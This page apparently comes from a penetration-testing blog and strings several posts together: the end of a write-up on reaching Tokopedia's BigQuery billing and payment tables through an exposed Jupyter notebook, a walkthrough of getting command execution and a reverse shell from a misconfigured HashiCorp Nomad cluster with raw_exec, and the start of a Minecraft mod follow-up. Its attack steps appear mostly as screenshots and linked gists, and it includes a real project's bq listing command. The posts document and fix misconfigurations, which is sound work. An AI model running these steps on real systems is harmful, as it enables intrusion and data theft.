<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigGLUpBY9W5kOLTNEu9m6rIt4OfkbMDv2HkshHgL6Nl3-StogRP2bwpGJx-CSG2wRHZVAZG9mgRmzC7BZUDSauYkmYVmkjgfNIjSXpFEi1nD8UgezGAzxaWlsGH4BMJCkMR7J8WJ2zCfA/s1600/ssh+to+seonper-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="552" data-original-width="1590" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigGLUpBY9W5kOLTNEu9m6rIt4OfkbMDv2HkshHgL6Nl3-StogRP2bwpGJx-CSG2wRHZVAZG9mgRmzC7BZUDSauYkmYVmkjgfNIjSXpFEi1nD8UgezGAzxaWlsGH4BMJCkMR7J8WJ2zCfA/s640/ssh+to+seonper-1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXL_ObVY1nk5uX_eUSb1uOU6VAhIQXNlPOK-rrFVfY3LaHaTHK7HBFdpcB0QCQ2X780dj0WgyIMphUFmiWJgCr_Gtvr2vyDwyx9hw-CAIP2fBlfNfM5VSWnT3cyVQn-M_7S9q5obsr15w/s1600/ssh-abe-mf-1-from-jupyter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="968" data-original-width="1600" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXL_ObVY1nk5uX_eUSb1uOU6VAhIQXNlPOK-rrFVfY3LaHaTHK7HBFdpcB0QCQ2X780dj0WgyIMphUFmiWJgCr_Gtvr2vyDwyx9hw-CAIP2fBlfNfM5VSWnT3cyVQn-M_7S9q5obsr15w/s640/ssh-abe-mf-1-from-jupyter.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNTfIv1AjnysH06UfkJ6H2EHaajz3QtLVRXafyaDyl2Pq3V4fMBjFquWJy3K010ccfePAoox9AK0vn1fXJI1MryJhBji1TdXqKIXEzbum1TEuF4JT4iJiP1UoprSSMlWFhyphenhyphenRjxapvne4Q/s1600/cat+bash_history+on+ab-md-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="962" data-original-width="1600" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNTfIv1AjnysH06UfkJ6H2EHaajz3QtLVRXafyaDyl2Pq3V4fMBjFquWJy3K010ccfePAoox9AK0vn1fXJI1MryJhBji1TdXqKIXEzbum1TEuF4JT4iJiP1UoprSSMlWFhyphenhyphenRjxapvne4Q/s640/cat+bash_history+on+ab-md-1.png" width="640" /></a></div>
<br />
Bigquery tables o_0<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">[+] Bigquery access [+]</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">bq ls --format=prettyjson --project_id tokopedia-970</span><br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs26OVfvWTagWd6XkF40lnb13jbUNMBTvSbCcbgtzo6g9ijqjxoKaL9yUgIpA5x2kXA2QxcixSBtFouSALOhlMJMrhpmHj6UkyhnpFQjMDNotTH4tke5xUeSTFy9au0jbdGPe2QlUjGc0/s1600/Screen+Shot+2020-03-13+at+10.23.35+PM.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="724" data-original-width="998" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs26OVfvWTagWd6XkF40lnb13jbUNMBTvSbCcbgtzo6g9ijqjxoKaL9yUgIpA5x2kXA2QxcixSBtFouSALOhlMJMrhpmHj6UkyhnpFQjMDNotTH4tke5xUeSTFy9au0jbdGPe2QlUjGc0/s320/Screen+Shot+2020-03-13+at+10.23.35+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Dat billing table yo</td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju2aPLTBgI0XIX99e7qOoJb3ffho76zC3SLWYwT1KAOb3M0x6pjovZOnB-q18ZbIxL6mBo57QTOkEgZ9DzqpKjL8YIa6gZwOZdmRWQd7HZQ4eNLhQbw2fAo4CujLzWgyhysSHiBJybsGQ/s1600/Screen+Shot+2020-03-13+at+10.23.57+PM.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="728" data-original-width="1230" height="189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju2aPLTBgI0XIX99e7qOoJb3ffho76zC3SLWYwT1KAOb3M0x6pjovZOnB-q18ZbIxL6mBo57QTOkEgZ9DzqpKjL8YIa6gZwOZdmRWQd7HZQ4eNLhQbw2fAo4CujLzWgyhysSHiBJybsGQ/s320/Screen+Shot+2020-03-13+at+10.23.57+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">I love payments tables</td></tr>
</tbody></table>
<br />
<div>
<br />
Along the way I searched who this company was. <a href="https://en.wikipedia.org/wiki/Tokopedia">https://en.wikipedia.org/wiki/Tokopedia</a></div>
<div>
<br /></div>
<div>
Most interestingly...</div>
<div>
<br /></div>
<blockquote class="tr_bq">
<span style="background-color: white; color: #222222; font-family: sans-serif;">In 2017, Tokopedia received $1.1 billion investment from Chinese e-commerce giant Alibaba.</span><sup class="reference" id="cite_ref-7" style="background-color: white; color: #222222; font-family: sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;"><a href="https://en.wikipedia.org/wiki/Tokopedia#cite_note-7" style="background: none; color: #0b0080; text-decoration-line: none;">[7]</a></sup><span style="background-color: white; color: #222222; font-family: sans-serif;"> Again in 2018, the company secured $1.1 billion funding round led by Chinese e-commerce giant </span><a href="https://en.wikipedia.org/wiki/Alibaba_Group" style="background: none rgb(255, 255, 255); color: #0b0080; font-family: sans-serif; text-decoration-line: none;" title="Alibaba Group">Alibaba Group</a><span style="background-color: white; color: #222222; font-family: sans-serif;"> Holding and Japan's </span><a class="mw-redirect" href="https://en.wikipedia.org/wiki/SoftBank" style="background: none rgb(255, 255, 255); color: #0b0080; font-family: sans-serif; text-decoration-line: none;" title="SoftBank">SoftBank</a><span style="background-color: white; color: #222222; font-family: sans-serif;"> Group</span><sup class="reference" id="cite_ref-8" style="background-color: white; color: #222222; font-family: sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;"><a href="https://en.wikipedia.org/wiki/Tokopedia#cite_note-8" style="background: none; color: #0b0080; text-decoration-line: none;">[8]</a></sup><span style="background-color: white; color: #222222; font-family: sans-serif;"> putting its valuation to about $7B.</span><sup class="reference" id="cite_ref-9" style="background-color: white; color: #222222; font-family: sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;"><a href="https://en.wikipedia.org/wiki/Tokopedia#cite_note-9" style="background: none; color: #0b0080; text-decoration-line: none;">[9]</a></sup></blockquote>
So being a good person (tm) I reported the issue and it was assigned a critical severity. The fixed it super quickly and the team was decently responsive until it was fixed. After that it took 2 weeks to get information on the bounty, I promptly provided payment info, but I was never paid and they have stopped responding to my inquiries.<br />
<br />
<br />
<b>Solutions:</b><br />
Run in a limited privilege container (doesn't protect against cloud metadata attack)<br />
<br />
New versions of Juypter notebook allow for password protecting access. Do that instead of open to allUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-15557776668430317962019-12-16T11:43:00.000-05:002019-12-16T12:45:22.538-05:00Devoops: Nomad with raw_exec enabled"Nomad is a flexible container orchestration tool that enables an organization to
easily deploy and manage any containerized or legacy application using a single,
unified workflow. Nomad can run a diverse workload of Docker, non-containerized,
microservice, and batch applications, and generally offers the following benefits
to developers and operators..."<br />
<br />
from: <a href="https://www.nomadproject.io/intro/index.html" target="_blank">https://www.nomadproject.io/intro/index.html</a><br />
<br />
To get a feel for where it fits in the HashiCorp ecosphere take a look at the following graphic:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ9QlLr-VtGooRSnb9nyLDGFwz34YQBvr4VW4M2STPc2-tg3B9kKyHJ_v4gcM-35fQY_zE662fTH8C1m3Ag8qbD5c9BosEaeQ65eAFIJcvhY6qdFBetT7ohPQCgzY-rkKwPuYZyZ9fEsY/s1600/Screen+Shot+2018-12-18+at+10.57.58+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="534" data-original-width="1600" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ9QlLr-VtGooRSnb9nyLDGFwz34YQBvr4VW4M2STPc2-tg3B9kKyHJ_v4gcM-35fQY_zE662fTH8C1m3Ag8qbD5c9BosEaeQ65eAFIJcvhY6qdFBetT7ohPQCgzY-rkKwPuYZyZ9fEsY/s400/Screen+Shot+2018-12-18+at+10.57.58+AM.png" width="400" /></a></div>
<br />
I'd like to thank <a href="https://twitter.com/willbtlr" target="_blank">Will Butler</a> for letting me write this up after watching him pwn it.<br />
<br />
You can get a dev environment up and running using the tutorial here:<br />
<a href="https://www.nomadproject.io/intro/getting-started/install.html" target="_blank">https://www.nomadproject.io/intro/getting-started/install.html</a><br />
<br />
The walkthru has you run it as a dev environment which wont bind to 0.0.0.0 so you'll need the following server and client files to get an appropriate environment up and running after you Vagrant up.<br />
<br />
server: <a href="https://gist.github.com/carnal0wnage/ce4296137414bd16fcca0818208b39b7" target="_blank">https://gist.github.com/carnal0wnage/ce4296137414bd16fcca0818208b39b7</a><br />
client1: <a href="https://gist.github.com/carnal0wnage/4abde0ee31f4d730019e6fa04ef6d3b6" target="_blank">https://gist.github.com/carnal0wnage/4abde0ee31f4d730019e6fa04ef6d3b6</a><br />
client2: <a href="https://gist.github.com/carnal0wnage/a4399019a943862e57283c29994ce5da" target="_blank">https://gist.github.com/carnal0wnage/a4399019a943862e57283c29994ce5da</a><br />
<br />
If you get everything up and running correctly you should be able to connect to the UI on port 4646 and see the example job<br />
<br />
<div class="p1">
<span class="s1">$ nomad job run example.nomad</span></div>
<div class="p1">
<span class="s1">==> Monitoring evaluation "ac9b4b08"</span></div>
<div class="p1">
<span class="s1"><span class="Apple-converted-space"> </span>Evaluation triggered by job "example"</span></div>
<div class="p1">
<span class="s1"><span class="Apple-converted-space"> </span>Evaluation within deployment: "8a7dfe0f"</span></div>
<div class="p1">
<span class="s1"><span class="Apple-converted-space"> </span>Allocation "57e65abe" created: node "a15034e5", group "cache"</span></div>
<div class="p1">
<span class="s1"><span class="Apple-converted-space"> </span>Evaluation status changed: "pending" -> "complete"</span></div>
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f4f4f4; background-color: #000000}
span.s1 {font-variant-ligatures: no-common-ligatures}
</style>
<br />
<div class="p1">
<span class="s1">==> Evaluation "ac9b4b08" finished with status "complete"</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOElT3HECII9VIWEIfPBE2z5JE8NVOliGSs0fOkuLL4tFbzO8faRYIdW6axFxHcr9iR_m2EJa6gIGq5opsfSkwlTbJ644dHm1AB_Sf4ORUGRB1rSuWALMLV8eYiBPMxV7XbdRJsEUEWfY/s1600/Screen+Shot+2018-12-18+at+11.10.44+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="494" data-original-width="1600" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOElT3HECII9VIWEIfPBE2z5JE8NVOliGSs0fOkuLL4tFbzO8faRYIdW6axFxHcr9iR_m2EJa6gIGq5opsfSkwlTbJ644dHm1AB_Sf4ORUGRB1rSuWALMLV8eYiBPMxV7XbdRJsEUEWfY/s400/Screen+Shot+2018-12-18+at+11.10.44+AM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
jobs in the nomad UI</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPGjA_m2RSbEVEWM4yxZ_hXthvuE6hxafRXl6TU-onoRGFttN4jtEWpr1KUSqtjO9BvS9CORcGU6J-CgVxLBC6kGFMv5uJRZ8AUPGXTHuznstpQBSxboh28tzLCulH9O1c6wWRlamIFe4/s1600/Screen+Shot+2018-12-18+at+11.11.03+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="1600" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPGjA_m2RSbEVEWM4yxZ_hXthvuE6hxafRXl6TU-onoRGFttN4jtEWpr1KUSqtjO9BvS9CORcGU6J-CgVxLBC6kGFMv5uJRZ8AUPGXTHuznstpQBSxboh28tzLCulH9O1c6wWRlamIFe4/s400/Screen+Shot+2018-12-18+at+11.11.03+AM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
servers in the nomad UI</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMc-N-WTmCYi_Oix_7t5Lg4HME1syM1TdMQyQWQ1Q4AgPT0kZIiaQcbDl6Yylw2ZFGVQAJzcEkC_c5ziktyWKABv16uQIjgXem5SdRQbJGYxsRmoc2R-f4oNpWeCBupWZiU0_Qv2RoLCI/s1600/Screen+Shot+2018-12-18+at+11.10.56+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="490" data-original-width="1600" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMc-N-WTmCYi_Oix_7t5Lg4HME1syM1TdMQyQWQ1Q4AgPT0kZIiaQcbDl6Yylw2ZFGVQAJzcEkC_c5ziktyWKABv16uQIjgXem5SdRQbJGYxsRmoc2R-f4oNpWeCBupWZiU0_Qv2RoLCI/s400/Screen+Shot+2018-12-18+at+11.10.56+AM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
clients in the nomad UI</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: left;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: left;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: left;">Leveraging misconfiguration time. Nomad ships with a raw_exec option that is disabled by default.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
ref: <a href="https://www.nomadproject.io/docs/drivers/raw_exec.html" target="_blank">https://www.nomadproject.io/docs/drivers/raw_exec.html</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
the raw_exec option allow you to run a command outside isolation on the nomad host. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
"The <code>raw_exec</code> driver can run on all supported operating systems. For security
reasons, it is disabled by default. To enable raw exec, the Nomad client
configuration must explicitly enable the <code>raw_exec</code> driver in the client's
<a href="https://www.nomadproject.io/docs/configuration/client.html#options" target="_blank">options</a>:"</div>
<br />
How can you see if the raw_exec module is enabled on the clients?<br />
<br />
You can check it out it the UI:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZ8YIeTGgA4cZsvq_f_u4YB3bS4comJYJWlwN7v-ZzEeY6jjQLVePRo66fIEGD2wdwodrtooFzb1zD7A4fMFn2-Qya-jXkqHtLIpvN29TjsroA2b0znj7eWJez7CGN5k3OZ8kEVXGqxY/s1600/Screen+Shot+2018-12-18+at+11.16.07+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="940" data-original-width="1600" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsZ8YIeTGgA4cZsvq_f_u4YB3bS4comJYJWlwN7v-ZzEeY6jjQLVePRo66fIEGD2wdwodrtooFzb1zD7A4fMFn2-Qya-jXkqHtLIpvN29TjsroA2b0znj7eWJez7CGN5k3OZ8kEVXGqxY/s400/Screen+Shot+2018-12-18+at+11.16.07+AM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
or by hitting the API endpoint</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoGOt8gFdkDovoE9iR2PRZqOX8HZFz8NF8GDV9T-w0czFmxZ1BUGViZkoaqFqw1k_0U3bhELzSAppnqR2koKq4IG8uDh-JmZhE2REfG7nHxNgheHMng20K71CRcuwm2rygi9S-X2X0xn8/s1600/Screen+Shot+2018-12-18+at+11.19.58+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="730" data-original-width="1600" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoGOt8gFdkDovoE9iR2PRZqOX8HZFz8NF8GDV9T-w0czFmxZ1BUGViZkoaqFqw1k_0U3bhELzSAppnqR2koKq4IG8uDh-JmZhE2REfG7nHxNgheHMng20K71CRcuwm2rygi9S-X2X0xn8/s400/Screen+Shot+2018-12-18+at+11.19.58+AM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Let's exploit this thing.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We need to create a job hcl file with our commands. Here is gist with a simple one:</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://gist.github.com/carnal0wnage/25b391126dadefe0a9523fb421bf8f33" target="_blank">https://gist.github.com/carnal0wnage/25b391126dadefe0a9523fb421bf8f33</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfMwq4-SuLGELxk5L_opJUNlVV5G66uTKsB6Lk29PXazpqWqNI5aqWgPBuBhpzFCFWvxQ61nNxYwrI3YY-pp1RPkxzbdU6g-G_UsJwN69kywvIr8IUNt7XLxCluzUfNIzWvRWTcodzWCo/s1600/Screen+Shot+2018-12-18+at+11.23.36+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="240" data-original-width="1600" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfMwq4-SuLGELxk5L_opJUNlVV5G66uTKsB6Lk29PXazpqWqNI5aqWgPBuBhpzFCFWvxQ61nNxYwrI3YY-pp1RPkxzbdU6g-G_UsJwN69kywvIr8IUNt7XLxCluzUfNIzWvRWTcodzWCo/s640/Screen+Shot+2018-12-18+at+11.23.36+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
starting the service</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrbWRhrEX7c-WdoLdbJ9e3LZofyYDrn4QOCLlttNSZLG_WVsCx3BDv-xU_K9WXG0Ac5N46MH57ik45kHlLFLvZ3kGPeggEzuu3Dx3U45r7tFBlVyexbRMvMekoSdh8sZ-FCN7qu9o_eQ4/s1600/Screen+Shot+2018-12-18+at+11.23.56+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="178" data-original-width="1426" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrbWRhrEX7c-WdoLdbJ9e3LZofyYDrn4QOCLlttNSZLG_WVsCx3BDv-xU_K9WXG0Ac5N46MH57ik45kHlLFLvZ3kGPeggEzuu3Dx3U45r7tFBlVyexbRMvMekoSdh8sZ-FCN7qu9o_eQ4/s640/Screen+Shot+2018-12-18+at+11.23.56+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Results of our job</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-p7jHQ0RwgfdKGlrR8V6EmUmSolkfktMbqhzyhez76pBvlyTbW1SW7Dlk5C4X2-HEhv5IOFsMPKJmRtLPN2bOCSMUrYl2KVmbcTu7wOWJfguwwyIw6qoxZ4dxPDxURQVOp6AXCV-APok/s1600/Screen+Shot+2018-12-18+at+11.26.22+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="348" data-original-width="1600" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-p7jHQ0RwgfdKGlrR8V6EmUmSolkfktMbqhzyhez76pBvlyTbW1SW7Dlk5C4X2-HEhv5IOFsMPKJmRtLPN2bOCSMUrYl2KVmbcTu7wOWJfguwwyIw6qoxZ4dxPDxURQVOp6AXCV-APok/s400/Screen+Shot+2018-12-18+at+11.26.22+AM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
job in the UI</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpwKuu3OKdc7JsBY_6-Tyepo-MwCH49LpHKoWn8aHcRx3Pu5Ld6tOlZaX5Df4MZMyNqZ2rvU5O4iMeIJuy4eKgoB1XSW7XAXY5FPktwtvdxlqknXXgmPRqutQEXG05PE49G854mbD3jDg/s1600/Screen+Shot+2018-12-18+at+11.27.17+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="167" data-original-width="1600" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpwKuu3OKdc7JsBY_6-Tyepo-MwCH49LpHKoWn8aHcRx3Pu5Ld6tOlZaX5Df4MZMyNqZ2rvU5O4iMeIJuy4eKgoB1XSW7XAXY5FPktwtvdxlqknXXgmPRqutQEXG05PE49G854mbD3jDg/s640/Screen+Shot+2018-12-18+at+11.27.17+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Stopping the job</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGcpIVEPCahotTk1ZYDNLcPI1gxdOD2jjrjTD9qSd_4bGE4Z29llePq3R0qj_VfAdixes_4NrHNIktGdBqLzEr7SRrPudfMT02usJ4DMltSbMdwu5fa3OWHMcd16Y6_eBE0GIU7NN5lxQ/s1600/Screen+Shot+2018-12-18+at+11.24.30+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="517" data-original-width="1600" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGcpIVEPCahotTk1ZYDNLcPI1gxdOD2jjrjTD9qSd_4bGE4Z29llePq3R0qj_VfAdixes_4NrHNIktGdBqLzEr7SRrPudfMT02usJ4DMltSbMdwu5fa3OWHMcd16Y6_eBE0GIU7NN5lxQ/s400/Screen+Shot+2018-12-18+at+11.24.30+AM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiza2dVv-hNAWpTeFCsysIeNHkSGnqjc57K_a7cNAN4tzs9CuC6Qv80DEpXXjX72NRXdr9JN82olebdExMZnMXn76riN5rc1gv4R9u3NALJZNMoTvwCSEFF2Graub0e56_KdT2W84YYaFs/s1600/Screen+Shot+2018-12-18+at+11.31.58+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="78" data-original-width="1358" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiza2dVv-hNAWpTeFCsysIeNHkSGnqjc57K_a7cNAN4tzs9CuC6Qv80DEpXXjX72NRXdr9JN82olebdExMZnMXn76riN5rc1gv4R9u3NALJZNMoTvwCSEFF2Graub0e56_KdT2W84YYaFs/s640/Screen+Shot+2018-12-18+at+11.31.58+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
forcefully run the garbage collection</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFOlgacL3qsblM44YqxlQnz_DDMbjnR4pL24ieUKbUQTSVsSbh7w3uuikQSxwDo5VF0d2kqhIFf20cwo1mX3ZU84S9jeWa5yhj1kpRoBbPCsAUrzNeA9kDvcBWiktEt2YQkzlFkga7JVI/s1600/jobs-gc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="449" data-original-width="1600" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFOlgacL3qsblM44YqxlQnz_DDMbjnR4pL24ieUKbUQTSVsSbh7w3uuikQSxwDo5VF0d2kqhIFf20cwo1mX3ZU84S9jeWa5yhj1kpRoBbPCsAUrzNeA9kDvcBWiktEt2YQkzlFkga7JVI/s400/jobs-gc.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
validation the job was deleted</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
OK let's get a reverse shell. I used the following hcl file:</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://gist.github.com/carnal0wnage/4a436a8dc0dcb142a8c836e48916dd71" target="_blank">https://gist.github.com/carnal0wnage/4a436a8dc0dcb142a8c836e48916dd71</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIxyOpUjaCcIBoC-8xsjCexQp3oU02WRDD8flfVpDpLR9HV5Hej75FG8INf81-qfu1A60pooioeS53lXp4I8KH-vyr5bjKVNwyIpaMJ6fAMDlwxuavGkmmAYMhmnSiWuupytGWvwKC7us/s1600/Screen+Shot+2018-12-18+at+11.37.24+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="188" data-original-width="1600" height="74" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIxyOpUjaCcIBoC-8xsjCexQp3oU02WRDD8flfVpDpLR9HV5Hej75FG8INf81-qfu1A60pooioeS53lXp4I8KH-vyr5bjKVNwyIpaMJ6fAMDlwxuavGkmmAYMhmnSiWuupytGWvwKC7us/s640/Screen+Shot+2018-12-18+at+11.37.24+AM.png" width="640" /></a></div>
<div style="text-align: center;">
Reverse shell job</div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmN0UPapQTUMZZ1C1GTVzX7TOjB9kb0ytM5wk2lfP-sa4AoCtAlQXXZ6vcdRLvm4HiUEXI1GV27O6oTICDdDgAPzrZS4IYSWxoEBemfGdK4014yBRy_7QC49fRkCRCaE3V7_pcoNATjl4/s1600/Screen+Shot+2018-12-18+at+11.37.11+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="541" data-original-width="1600" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmN0UPapQTUMZZ1C1GTVzX7TOjB9kb0ytM5wk2lfP-sa4AoCtAlQXXZ6vcdRLvm4HiUEXI1GV27O6oTICDdDgAPzrZS4IYSWxoEBemfGdK4014yBRy_7QC49fRkCRCaE3V7_pcoNATjl4/s640/Screen+Shot+2018-12-18+at+11.37.11+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Shell from nomad</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
-CG</div>
<br />
Info on locking nomad down via ACLs:<br />
<a href="https://www.nomadproject.io/guides/security/acl.html" target="_blank">https://www.nomadproject.io/guides/security/acl.html</a><br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-29350634917049242662019-05-14T15:17:00.000-04:002019-05-14T15:17:58.378-04:00Minecraft Mod, Follow up, and Java ReflectionAfter <a href="https://carnal0wnage.attackresearch.com/2019/05/minecraft-mod-mothers-day-and-hacker-dad.html">yesterday's post</a>, I received a ton of interesting and creative responses regarding how to get around the mod's restrictions which is what I love about our community. <a href="https://twitter.com/mubix">Mubix</a> was the first person to reach out and suggest hijacking calls to Pastebin using /etc/hosts (which I did try but was having some wonky behavior with OSX) and there were other suggestions as well with regards to hijacking DNS and pretending to be the site (Pastebin).<br />
<br />
